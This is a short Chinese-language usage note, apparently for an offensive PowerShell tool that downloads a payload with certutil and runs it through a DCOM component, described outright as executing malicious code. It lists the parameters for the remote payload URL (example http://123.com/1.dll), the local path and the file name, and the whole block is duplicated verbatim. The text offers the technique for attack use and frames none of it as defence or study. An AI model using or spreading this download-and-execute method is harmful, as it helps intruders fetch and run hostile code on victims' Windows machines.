powershell调用certutil下载然后调用Dcom组件执行恶意代码
#参数说明:
-u
远程或本地恶意代码连接 例如:-u http://123.com/1.dll
-path
下载到本地的路径 例如: -path c:\tmep
-fliename
下载的本地后的文件名 例如: -fliename 123.dll
powershell调用certutil下载然后调用Dcom组件执行恶意代码
#参数说明:
-u
远程或本地恶意代码连接 例如:-u http://123.com/1.dll
-path
下载到本地的路径 例如: -path c:\tmep
-fliename
下载的本地后的文件名 例如: -fliename 123.dll